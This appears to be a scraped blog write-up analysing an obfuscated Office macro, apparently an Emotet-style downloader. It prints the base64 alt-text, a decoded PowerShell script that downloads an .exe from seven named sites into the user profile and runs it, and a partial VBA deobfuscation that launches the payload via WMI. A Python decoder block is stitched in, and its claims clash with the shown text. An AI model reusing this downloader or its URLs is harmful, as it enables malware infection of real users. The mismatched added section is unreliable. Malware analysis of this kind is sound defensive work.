bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, 
bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9ACg, bq,gAKg, bq,AAng, bq,AEcg, bq,AZAg, bq,AnAg, bq,CsAg, bq,JwBg, bq,lACg, bq,cAKg, bq,QArg, bq,ACgg, bq,AJwg, bq,B5Ag, bq,DcAg, bq,MAAg, bq,nACg, bq,sAJg, bq,wA5g, bq,ACcg, bq,AKQg, bq,ApAg, bq,DsAg, bq,JABg, bq,UAHg, bq,IANg, bq,wB5g, bq,ADAg, bq,AZQg, bq,BnAg, bq,D0Ag, bq,JgAg, bq,oACg, bq,cAbg, bq,gBlg, bq,AHcg, bq,ALQg, bq,BvAg, bq,GIAg, bq,agAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AGMg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dAAg, bq,nACg, bq,kAIg, bq,ABOg, bq,AEUg, bq,AVAg, bq,AuAg, bq,FcAg, bq,ZQBg, bq,iAEg, bq,MAbg, bq,ABpg, bq,AGUg, bq,Abgg, bq,B0Ag, bq,DsAg, bq,JABg, bq,DAHg, bq,gAZg, bq,QBhg, bq,AGsg, bq,Acgg, bq,BxAg, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAag, bq,AAng, bq,ACsg, bq,AJwg, bq,B0Ag, bq,HQAg, bq,JwAg, bq,rACg, bq,cAcg, bq,AA6g, bq,AC8g, bq,ALwg, bq,BoAg, bq,GEAg, bq,eQAg, bq,nACg, bq,sAJg, bq,wBtg, bq,AGUg, bq,AdAg, bq,BlAg, bq,HQAg, bq,cgAg, bq,nACg, bq,sAJg, bq,wBhg, bq,AGQg, bq,AaQg, bq,BuAg, bq,GcAg, bq,LgAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,AYwg, bq,BvAg, bq,G0Ag, bq,JwAg, bq,rACg, bq,cALg, bq,wB3g, bq,AHAg, bq,ALQg, bq,BpAg, bq,G4Ag, bq,JwAg, bq,rACg, bq,cAYg, bq,wBsg, bq,AHUg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZABg, bq,lACg, bq,cAKg, bq,QArg, bq,ACgg, bq,AJwg, bq,BzAg, bq,CcAg, bq,KwAg, bq,nACg, bq,8Aeg, bq,QBHg, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,RQBg, bq,MACg, bq,cAKg, bq,wAog, bq,ACcg, bq,ASwg, bq,BqAg, bq,CcAg, bq,KwAg, bq,nADg, bq,QALg, bq,wAqg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GgAg, bq,dABg, bq,0AHg, bq,AAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,A6Ag, bq,CcAg, bq,KwAg, bq,oACg, bq,cALg, bq,wAvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,HMAg, bq,JwAg, bq,pACg, bq,sAJg, bq,wBpg, bq,AG0g, bq,AJwg, bq,ArAg, bq,CcAg, bq,bwAg, 
bq,nACg, bq,sAJg, bq,wBmg, bq,AGYg, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,IAJg, bq,wArg, bq,ACcg, bq,AYgg, bq,BkAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAyg, bq,ADQg, bq,ALgg, bq,AnAg, bq,CsAg, bq,JwBg, bq,jAGg, bq,8Abg, bq,QAng, bq,ACkg, bq,AKwg, bq,AoAg, bq,CcAg, bq,LwBg, bq,3ACg, bq,cAKg, bq,wAng, bq,AHAg, bq,ALQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBug, bq,AGMg, bq,AbAg, bq,B1Ag, bq,CcAg, bq,KwAg, bq,nAGg, bq,QAZg, bq,QAng, bq,ACkg, bq,AKwg, bq,AnAg, bq,HMAg, bq,JwAg, bq,rACg, bq,gAJg, bq,wAvg, bq,AGYg, bq,AJwg, bq,ArAg, bq,CcAg, bq,cwBg, bq,pAFg, bq,EAYg, bq,wAng, bq,ACkg, bq,AKwg, bq,AnAg, bq,C8Ag, bq,KgAg, bq,nACg, bq,sAJg, bq,wBog, bq,AHQg, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,0AHg, bq,AAOg, bq,gAvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,C8Ag, bq,NAAg, bq,wADg, bq,EAag, bq,wBwg, bq,AGwg, bq,AYQg, bq,AnAg, bq,CsAg, bq,JwBg, bq,uACg, bq,cAKg, bq,wAng, bq,AHMg, bq,AJwg, bq,ArAg, bq,CcAg, bq,aQBg, bq,uAGg, bq,YAbg, bq,wAng, bq,ACkg, bq,AKwg, bq,AoAg, bq,CcAg, bq,LgBg, bq,jAGg, bq,8AJg, bq,wArg, bq,ACcg, bq,AbQg, bq,AnAg, bq,CkAg, bq,KwAg, bq,oACg, bq,cALg, bq,wBjg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GcAg, bq,aQAg, bq,nACg, bq,kAKg, bq,wAng, bq,AC0g, bq,AYgg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,kAbg, bq,gAng, bq,ACsg, bq,AJwg, bq,AvAg, bq,EsAg, bq,JwAg, bq,rACg, bq,cAdg, bq,ABGg, bq,AFIg, bq,Aawg, bq,AvAg, bq,CoAg, bq,JwAg, bq,rACg, bq,cAag, bq,AB0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CgAg, bq,JwBg, bq,0ACg, bq,cAKg, bq,wAng, bq,AHAg, bq,AOgg, bq,AnAg, bq,CkAg, bq,KwAg, bq,nACg, bq,8AJg, bq,wArg, bq,ACcg, bq,ALwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,YAag, bq,QAng, bq,ACsg, bq,AJwg, bq,BkAg, bq,GUAg, bq,bAAg, bq,nACg, bq,sAJg, bq,wBpg, bq,AHQg, bq,AeQg, bq,AnAg, bq,CkAg, bq,KwAg, bq,oACg, bq,cAZg, bq,wB1g, bq,AGkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZABg, bq,lACg, bq,4AYg, bq,wAng, bq,ACsg, bq,AJwg, bq,BvAg, bq,G0Ag, bq,LwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AGMg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZwBg, bq,pACg, bq,cAKg, bq,wAng, bq,AC0g, bq,AJwg, bq,ArAg, 
bq,CgAg, bq,JwBg, bq,iAGg, bq,kAbg, bq,gAng, bq,ACsg, bq,AJwg, bq,AvAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBWg, bq,AEEg, bq,ALwg, bq,AnAg, bq,CsAg, bq,JwAg, bq,qAGg, bq,gAdg, bq,AAng, bq,ACsg, bq,AJwg, bq,B0Ag, bq,HAAg, bq,cwAg, bq,nACg, bq,sAJg, bq,wA6g, bq,AC8g, bq,ALwg, bq,AnAg, bq,CkAg, bq,KwAg, bq,oACg, bq,cAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,BpAg, bq,HIAg, bq,bgBg, bq,hAGg, bq,sAbg, bq,QBpg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GQAg, bq,eQAg, bq,nACg, bq,sAJg, bq,wBlg, bq,ACcg, bq,AKQg, bq,ArAg, bq,CgAg, bq,JwBg, bq,jAGg, bq,kAJg, bq,wArg, bq,ACcg, bq,ALgg, bq,BjAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,G0Ag, bq,LwAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,wACg, bq,0AJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BpAg, bq,G4Ag, bq,JwAg, bq,rACg, bq,cAYg, bq,wAng, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,UAZg, bq,AAng, bq,ACsg, bq,AKAg, bq,AnAg, bq,GUAg, bq,JwAg, bq,rACg, bq,cAcg, bq,wAvg, bq,AHEg, bq,AJwg, bq,ApAg, bq,CsAg, bq,JwBg, bq,rACg, bq,cAKg, bq,wAng, bq,ADkg, bq,Adwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAFg, bq,cAMg, bq,gAvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,CoAg, bq,aAAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHQg, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,0AHg, bq,AAcg, bq,wA6g, bq,ACcg, bq,AKwg, bq,AnAg, bq,C8Ag, bq,LwBg, bq,zAHg, bq,UAYg, bq,gAng, bq,ACkg, bq,AKwg, bq,AoAg, bq,CcAg, bq,aQBg, bq,0AGg, bq,8AYg, bq,wBhg, bq,AHIg, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgBg, bq,lACg, bq,cAKg, bq,QArg, bq,ACcg, bq,ALgg, bq,BjAg, bq,CcAg, bq,KwAg, bq,nAGg, bq,8Abg, bq,QAng, bq,ACsg, bq,AJwg, bq,AvAg, bq,HcAg, bq,JwAg, bq,rACg, bq,gAJg, bq,wBwg, bq,AC0g, bq,AYwg, bq,BvAg, bq,CcAg, bq,KwAg, bq,nAGg, bq,4Adg, bq,ABlg, bq,ACcg, bq,AKwg, bq,AnAg, bq,G4Ag, bq,JwAg, bq,pACg, bq,sAKg, bq,AAng, bq,AHQg, bq,ALwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,CAHg, bq,kAZg, bq,QBPg, bq,AEEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,AOQg, bq,AvAg, bq,CcAg, bq,KwAg, bq,nACg, bq,oAag, bq,AB0g, bq,AHQg, 
bq,AJwg, bq,ArAg, bq,CcAg, bq,cABg, bq,zADg, bq,oAJg, bq,wApg, bq,ACsg, bq,AKAg, bq,AnAg, bq,C8Ag, bq,LwBg, bq,lAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BlAg, bq,HMAg, bq,JwAg, bq,pACg, bq,sAKg, bq,AAng, bq,AGEg, bq,AbAg, bq,AnAg, bq,CsAg, bq,JwBg, bq,pAGg, bq,IAJg, bq,wApg, bq,ACsg, bq,AKAg, bq,AnAg, bq,GEAg, bq,YQAg, bq,nACg, bq,sAJg, bq,wByg, bq,AGMg, bq,AJwg, bq,ApAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,gAag, bq,QB0g, bq,ACcg, bq,AKwg, bq,AnAg, bq,GUAg, bq,JwAg, bq,rACg, bq,cAYg, bq,wB0g, bq,ACcg, bq,AKwg, bq,AnAg, bq,C4Ag, bq,YwBg, bq,vAGg, bq,0ALg, bq,wB3g, bq,ACcg, bq,AKwg, bq,AnAg, bq,G8Ag, bq,cgBg, bq,kAHg, bq,AAcg, bq,gBlg, bq,ACcg, bq,AKwg, bq,AnAg, bq,HMAg, bq,cwAg, bq,nACg, bq,sAJg, bq,wAvg, bq,AFQg, bq,ALwg, bq,AnAg, bq,CkAg, bq,KQAg, bq,uACg, bq,IAcg, bq,wBgg, bq,AFAg, bq,ATAg, bq,BJAg, bq,FQAg, bq,IgAg, bq,oAFg, bq,sAYg, bq,wBog, bq,AGEg, bq,Acgg, bq,BdAg, bq,DQAg, bq,MgAg, bq,pADg, bq,sAJg, bq,ABTg, bq,AHIg, bq,AcAg, bq,B1Ag, bq,GIAg, bq,NgAg, bq,1ADg, bq,0AKg, bq,AAog, bq,ACcg, bq,ASQg, bq,A2Ag, bq,HoAg, bq,JwAg, bq,rACg, bq,cAZg, bq,ABfg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GwAg, bq,JwAg, bq,pACg, bq,sAJg, bq,wByg, bq,ACcg, bq,AKQg, bq,A7Ag, bq,GYAg, bq,bwBg, bq,yAGg, bq,UAYg, bq,QBjg, bq,AGgg, bq,AKAg, bq,AkAg, bq,FEAg, bq,ZQBg, bq,jAGg, bq,cAdg, bq,AA0g, bq,AHkg, bq,AIAg, bq,BpAg, bq,G4Ag, bq,IAAg, bq,kAEg, bq,MAeg, bq,ABlg, bq,AGEg, bq,Aawg, bq,ByAg, bq,HEAg, bq,KQBg, bq,7AHg, bq,QAcg, bq,gB5g, bq,AHsg, bq,AJAg, bq,BUAg, bq,HIAg, bq,NwBg, bq,5ADg, bq,AAZg, bq,QBng, bq,AC4g, bq,AIgg, bq,BEAg, bq,G8Ag, bq,YABg, bq,XAGg, bq,4AYg, bq,ABMg, bq,AE8g, bq,AQQg, bq,BEAg, bq,GYAg, bq,aQBg, bq,sAEg, bq,UAIg, bq,gAog, bq,ACQg, bq,AUQg, bq,BlAg, bq,GMAg, bq,ZwBg, bq,0ADg, bq,QAeg, bq,QAsg, bq,ACAg, bq,AJAg, bq,BCAg, bq,G4Ag, bq,cABg, bq,fAHg, bq,MANg, bq,QB2g, bq,ACkg, bq,AOwg, bq,AkAg, bq,EMAg, bq,cgBg, bq,jAHg, bq,QAdg, bq,ABug, bq,AHYg, bq,APQg, bq,AoAg, bq,CgAg, bq,JwBg, bq,SAGg, bq,MAJg, bq,wArg, bq,ACcg, bq,AdQg, bq,BtAg, bq,CcAg, bq,KQAg, bq,rACg, bq,cAdg, 
bq,QAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,HgAg, bq,JwAg, bq,pADg, bq,sASg, bq,QBmg, bq,ACAg, bq,AKAg, bq,AoAg, bq,C4Ag, bq,KAAg, bq,nAEg, bq,cAZg, bq,QB0g, bq,AC0g, bq,ASQg, bq,B0Ag, bq,CcAg, bq,KwAg, bq,nAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,AbQg, bq,AnAg, bq,CkAg, bq,IAAg, bq,kAEg, bq,IAbg, bq,gBwg, bq,AF8g, bq,Acwg, bq,A1Ag, bq,HYAg, bq,KQAg, bq,uACg, bq,IATg, bq,ABlg, bq,AGAg, bq,ATgg, bq,BgAg, bq,EcAg, bq,VABg, bq,IACg, bq,IAIg, bq,AAtg, bq,AGcg, bq,AZQg, bq,AgAg, bq,DMAg, bq,NwAg, bq,5ADg, bq,cANg, bq,gApg, bq,ACAg, bq,Aewg, bq,AmAg, bq,CgAg, bq,JwBg, bq,JAGg, bq,4Adg, bq,gBvg, bq,AGsg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZQAg, bq,nACg, bq,sAJg, bq,wAtg, bq,ACcg, bq,AKwg, bq,AnAg, bq,EkAg, bq,dABg, bq,lAGg, bq,0AJg, bq,wApg, bq,ACgg, bq,AJAg, bq,BCAg, bq,G4Ag, bq,cABg, bq,fAHg, bq,MANg, bq,QB2g, bq,ACkg, bq,AOwg, bq,AkAg, bq,EMAg, bq,bgBg, bq,tAGg, bq,4Adg, bq,gAxg, bq,AGIg, bq,APQg, bq,AoAg, bq,CcAg, bq,RQAg, bq,xACg, bq,cAKg, bq,wAog, bq,ACcg, bq,Aegg, bq,AwAg, bq,G4Ag, bq,YwAg, bq,nACg, bq,sAJg, bq,wA5g, bq,ACcg, bq,AKQg, bq,ApAg, bq,DsAg, bq,YgBg, bq,yAGg, bq,UAYg, bq,QBrg, bq,ADsg, bq,AJAg, bq,BFAg, bq,HUAg, bq,bwAg, bq,4AGg, bq,8Aag, bq,ABug, bq,AD0g, bq,AKAg, bq,AnAg, bq,FcAg, bq,JwAg, bq,rACg, bq,gAJg, bq,wA3g, bq,AF8g, bq,AbAg, bq,ByAg, bq,CcAg, bq,KwAg, bq,nADg, bq,QAYg, bq,wAng, bq,ACkg, bq,AKQg, bq,B9Ag, bq,H0Ag, bq,YwBg, bq,hAHg, bq,QAYg, bq,wBog, bq,AHsg, bq,AfQg, bq,B9Ag, bq,CQAg, bq,VQBg, bq,tADg, bq,gAMg, bq,ABmg, bq,AHYg, bq,AdAg, bq,A9Ag, bq,CgAg, bq,KAAg, bq,nAEg, bq,EAJg, bq,wArg, bq,ACcg, bq,ANgg, bq,BtAg, bq,CcAg, bq,KQAg, bq,rACg, bq,cAeg, bq,AA3g, bq,ACcg, bq,AKwg, bq,AnAg, bq,HYAg, bq,bAAg, bq,nACg, bq,kA\r\n<\/pre>\n<p>I am assuming there is some sort of character limit when looking at it in the GUI versus code. The bit that I had grabbed is only a forth of all the characters from what I could tell. 
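<\/p>\n<p>To make the above reproducible, here is a small Python script (added for this write-up, not part of the macro or of the original post) that does to the alt-text what the macro does: it splits on the junk separator &#8220;g, bq,&#8221; and rejoins the pieces (the Split and Join in Zk46e7c8d40), prepends the &#8220;powershe&#8221; fragment the macro adds in Qfyk87zgdp86ufle, pulls out the argument that follows -en (PowerShell accepts that abbreviation of -EncodedCommand) and base64-decodes it as UTF-16LE. It also copes with a copy that was cut off the way the alt-text pane cut this one off: a short tail is padded, and when the length is 1 mod 4 the stray character is dropped. The sample input is a constructed excerpt, the leading junk and the first 33 base64 chunks of the alt-text shown above with the long run of padding spaces shortened to three; the function and variable names are mine.<\/p>

```python
"""Reproduce the macro's alt-text deobfuscation and decode the -EncodedCommand payload."""
import base64
from typing import Dict, Optional

# Junk separator the macro splits on (the "g, bq," seen throughout the alt-text).
SEPARATOR = "g, bq,"

# Constructed excerpt: the leading junk and the first 33 three-character
# base64 chunks of the sample's alt-text, laid out as in the document
# (chunk + separator); the long run of " g, bq," padding is shortened to three.
SAMPLE_ALT_TEXT = (
    "g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq,"
    " JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,"
    "KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,"
    "dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,"
    "KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,"
    "JwB"
)


def strip_separators(alt_text: str, separator: str = SEPARATOR) -> str:
    """Mirror of the macro's Zk46e7c8d40: Split on the separator, Join with ''.

    The Join delimiter variable in the macro is empty, so the chunks simply
    concatenate back into the real command line.
    """
    return "".join(alt_text.split(separator))


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the argument following -EncodedCommand or one of its abbreviations.

    powershell.exe accepts -e, -ec, -en, -enc, ... up to the full name, so any
    prefix of "-encodedcommand" (plus "-ec") is matched case-insensitively.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        low = tok.lower()
        if low == "-ec" or (len(low) >= 2 and "-encodedcommand".startswith(low)):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str) -> str:
    """Decode an -EncodedCommand value (base64 of UTF-16LE), tolerating truncation.

    A copy taken from a GUI pane may be cut off mid-chunk, like the alt-text in
    this write-up that ends on a lone '9'. A length of 1 mod 4 cannot be valid
    base64, so the stray character is dropped; any other short tail is padded,
    and a trailing half code unit is discarded before the UTF-16 decode.
    """
    b64 = b64.strip()
    if len(b64) % 4 == 1:
        b64 = b64[:-1]
    b64 += "=" * (-len(b64) % 4)
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le")


def deobfuscate(alt_text: str) -> Dict[str, Optional[str]]:
    """Rebuild the command line the way Qfyk87zgdp86ufle does and decode its payload."""
    command_line = "powe" + "rshe" + strip_separators(alt_text)
    encoded = extract_encoded_command(command_line)
    script = decode_encoded_command(encoded) if encoded else None
    return {"command_line": command_line, "encoded": encoded, "script": script}


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_ALT_TEXT)
    print("command line:", result["command_line"][:60], "...")
    print("decoded script:", result["script"])
```

<p>On the excerpt this yields the first statement of the script, $Uevwzgz=((&#8216;B&#8217;+&#8216;knt&#8217;)+(&#8216;45&#8217;+&#8216;p&#8217;));, and the start of the second; the decoded text keeps the single quotes around every concatenated fragment, which is how the string-building obfuscation of the PowerShell stage works. Fed the complete base64 string, the same functions produce the full script listed further down.<\/p>
<p>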
Taking the above base64 string and decoding it I got the following (beautified for readability):<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n$Uevwzgz=((Bknt)(45p));\r\n&amp;(new-item) $ENV:usErprOFile\\yv3Wm9g\\wZN78e8\\ -itemtype dIReCToRy;\r\n&#x5B;Net.ServicePointManager]::&quot;SEC`UrI`TYP`ROtOC`ol&quot; = ((tls12,) t(ls11, t)ls);\r\n$Q3ywioo = ((Tii)(0bc)p);\r\n$Efe5qz9=(W(z5d4)4e);\r\n$Bnp_s5v=$env:userprofile(((gQWYv3)wm9g(gQW)(Wzn7)8e(8gQW)).&quot;rep`l`Ace&quot;((&#x5B;ChAr]103&#x5B;ChAr]81&#x5B;ChAr]87),&#x5B;sTRING]&#x5B;ChAr]92))$Q3ywioo(.(exe));\r\n$Xstbuxr=((Gde)(y709));\r\n$Tr7y0eg=&amp;(new-object) NET.WebClient;\r\n$Cxeakrq=((http:\/\/haymetetrading.)(com\/wp-include)(s\/yG)EL(Kj4\/*http):(\/\/s)imoff(erbd)(24.com)(\/wp-i)(nclude)s(\/fsiQc)\/*ht(tp:\/\/401kplansinfo)(.com)(\/cgi)-b(in\/KtFRk\/*ht)(tp:)\/\/(fidelity)(guide.com\/)cgi-(bin\/)(VA\/*http:\/\/)(sirnakmidye)(ci.c)(om\/)(wp-)includ(es\/q)k9w(W2\/*h)t(tps:\/\/sub)(itocarne).com\/w(p-conten)(t\/ByeOAt)(9\/*https:)(\/\/elies)(alib)(aarc)(hitect.com\/wordpress\/T\/)).&quot;s`PLIT&quot;(&#x5B;char]42);\r\n$Srpub65=((I6zd_l)r);\r\nforeach($Qecgt4y in $Cxeakrq){try{$Tr7y0eg.&quot;Do`Wn`LOADfilE&quot;($Qecgt4y, $Bnp_s5v);\r\n$Crcttnv=((Rcum)ukx);\r\nIf ((.(Get-Item) $Bnp_s5v).&quot;Le`N`GTH&quot; -ge 37976) {&amp;(Invoke-Item)($Bnp_s5v);\r\n$Cnmnv1b=(E1(z0nc9));\r\nbreak;\r\n$Euo8ohn=(W(7_lr4c))}}catch{}}$Um80fvt=((A6m)x7vl)\r\n<\/pre>\n<p>The following is my attempt to deobfuscate the script function by function as I walked my way through it. The only part that is not in there is the expanded base64 found above. The part not indented is the original and the one that is indented is the de-obfuscated code with the values dropped in for completeness. 
<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nFunction Cbzdhgt82a6foxc53q()\r\n   On Error Resume Next\r\n   Quuseim6entz = 90\r\n   Ay7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))\r\n   Ihietwpuyrj0nq6 = &quot;g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq,&quot; + Ay7pmbj8ld_rk9 + &quot;g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq,&quot; + p + &quot;g, bq,rog,   bq,g, bq,ceg, bq,sg, bq,sg, bq,&quot;\r\n   Wuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)\r\n   Set Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)\r\n   Oxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber\r\n   Set Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)\r\n   Cfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel\r\nEnd Function\r\n      \r\n      Function Cbzdhgt82a6foxc53q()\r\n         On Error Resume Next\r\n         Quuseim6entz = 90\r\n         Ay7pmbj8ld_rk9 = s (Vc0veos27yszc gets dropped sicne it is empty\/null)\r\n         Ihietwpuyrj0nq6 = &quot;g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq,&quot; + s + &quot;g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq,&quot; + p + &quot;g, bq,rog,   bq,g, bq,ceg,      bq,sg, bq,sg, bq,&quot;\r\n         Wuueqzhfpms6gh3_p = winmgmt&quot;+s+&quot;:win32_&quot;+p+&quot;rocess\r\n         Set Cfsnuq6d3vy5e = CreateObject(winmgmt&quot;+s+&quot;:win32_&quot;+p+&quot;rocess)\r\n         Oxxxpk19hkgi4c7c0z = winmgmt&quot;+s+&quot;:win32_&quot;+p+&quot;rocess + s + tar + tu\r\n         Set Tn1cdl9lltyho4skel = winmgmt&quot;+s+&quot;:win32_&quot;+p+&quot;rocess + s + tar + tu + p\r\n         Cfsnuq6d3vy5e.Create &quot;powe&quot; + &quot;rshe&quot; + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , 
